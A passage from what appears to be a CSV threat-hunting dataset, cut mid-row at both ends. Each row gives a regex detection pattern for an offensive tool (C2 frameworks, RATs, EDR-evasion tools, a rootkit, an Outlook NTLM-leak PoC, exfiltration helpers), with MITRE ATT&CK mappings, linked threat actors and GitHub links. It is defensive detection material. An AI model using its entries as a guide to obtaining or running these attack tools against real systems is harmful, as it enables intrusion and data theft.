- T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","58392" "*send_ratcode(ratID=*",".{0,1000}send_ratcode\(ratID\=.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58393" 
"*send_shellcode_msbuild_xml(*ratID*",".{0,1000}send_shellcode_msbuild_xml\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58394" "*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","58395" "*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","58396" 
"*SendBuffer(C2Socket*",".{0,1000}SendBuffer\(C2Socket.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","58403" "*Send-CalendarNTLMLeak *",".{0,1000}Send\-CalendarNTLMLeak\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","58404" "*sendcmd(*cmd:PSCMDMessage*",".{0,1000}sendcmd\(.{0,1000}cmd\:PSCMDMessage.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","58405" "*Sending init packet to PSEXECSVC*",".{0,1000}Sending\sinit\spacket\sto\sPSEXECSVC.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","58406" "*Sending loot to pastebin webserver.*",".{0,1000}Sending\sloot\sto\spastebin\swebserver\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - 
T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58407" "*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","58408" "*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","58409" "*Sending msf payload *",".{0,1000}Sending\smsf\spayload\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - 
T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","58410" "*Sending PSExecSVC version 190 *",".{0,1000}Sending\sPSExecSVC\sversion\s190\s.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","58411" "*Sending Sirep payload*",".{0,1000}Sending\sSirep\spayload.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","58412" "*sendmail -osendmail chmod +x sendmail*",".{0,1000}sendmail\s\-osendmail\schmod\s\+x\ssendmail.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitrary cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","58414" "*sends the jscript file to the rat (JS 
and HTA only) to be evaulated in line. Useful for Gadget2JS payloads*",".{0,1000}sends\sthe\sjscript\sfile\sto\sthe\srat\s\(JS\sand\sHTA\sonly\)\sto\sbe\sevaulated\sin\sline\.\sUseful\sfor\sGadget2JS\spayloads.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58415" "*Send-TelegramMessage -message *",".{0,1000}Send\-TelegramMessage\s\-message\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","58416" "*SendToPasteBin.ps1*",".{0,1000}SendToPasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58417" "*sense2john.py*",".{0,1000}sense2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58418" "*sensepost/goDoH*",".{0,1000}sensepost\/goDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","58419" "*sensepost/godoh*",".{0,1000}sensepost\/godoh.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","58420" "*sensepost/impersonate*",".{0,1000}sensepost\/impersonate.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","58421" "*sensepost/kwetza*",".{0,1000}sensepost\/kwetza.{0,1000}","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. 
Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","N/A","7","645","238","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z","58422" "*sensepost/rattler*",".{0,1000}sensepost\/rattler.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","58423" "*sensepost/reGeorg*",".{0,1000}sensepost\/reGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","58424" "*sensepost/ruler*",".{0,1000}sensepost\/ruler.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","58425" "*sensepost/susinternals*",".{0,1000}sensepost\/susinternals.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral 
Movement","https://github.com/sensepost/susinternals","1","1","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","58426" "*sensepost/wiresocks*",".{0,1000}sensepost\/wiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","58427" "*sensitive_files_win.txt*",".{0,1000}sensitive_files_win\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58428" "*Sensitivelocalfiles.txt*",".{0,1000}Sensitivelocalfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","58429" "*senzee1984/EDRPrison*",".{0,1000}senzee1984\/EDRPrison.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","1","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","58430" "*senzee1984/InflativeLoading*",".{0,1000}senzee1984\/InflativeLoading.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","58431" 
"*senzee1984/micr0_shell*",".{0,1000}senzee1984\/micr0_shell.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","58432" "*senzee1984/MutationGate*",".{0,1000}senzee1984\/MutationGate.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","58433" "*seq.localtonet.com/api*",".{0,1000}seq\.localtonet\.com\/api.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","58434" "*SeRestorePrivilegePoC.exe*",".{0,1000}SeRestorePrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58435" "*seriously_nothing_shady_here*",".{0,1000}seriously_nothing_shady_here.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58436" "*Serve Pyramid files over HTTP/S and provide basic authentication.*",".{0,1000}Serve\sPyramid\sfiles\sover\sHTTP\/S\sand\sprovide\sbasic\sauthentication\..{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","58437" "*serve_ps1_payload*",".{0,1000}serve_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - 
T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","58438" "*Server enforces NLA; switching to 'fake server' mode*",".{0,1000}Server\senforces\sNLA\;\sswitching\sto\s\'fake\sserver\'\smode.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58439" "*server.py generate --address * --port * --output * --source*",".{0,1000}server\.py\sgenerate\s\-\-address\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-output\s.{0,1000}\s\-\-source.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","58443" "*server.sin_port = htons(3567)*",".{0,1000}server\.sin_port\s\=\shtons\(3567\).{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","58445" "*server/capture/http_ntlm*",".{0,1000}server\/capture\/http_ntlm.{0,1000}","offensive_tool_keyword","metasploit","llmnr spoofing used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - 
T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58446" "*server/modules/csharp/*",".{0,1000}server\/modules\/csharp\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58447" "*server/ToRat_server*",".{0,1000}server\/ToRat_server.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using 
Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","58448" "*server@egress-asses.com*",".{0,1000}server\@egress\-asses\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","#email","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","58449" "*server=*port=53531*",".{0,1000}server\=.{0,1000}port\=53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","58450" "*-server=http://127.0.0.1:4002*",".{0,1000}\-server\=http\:\/\/127\.0\.0\.1\:4002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over 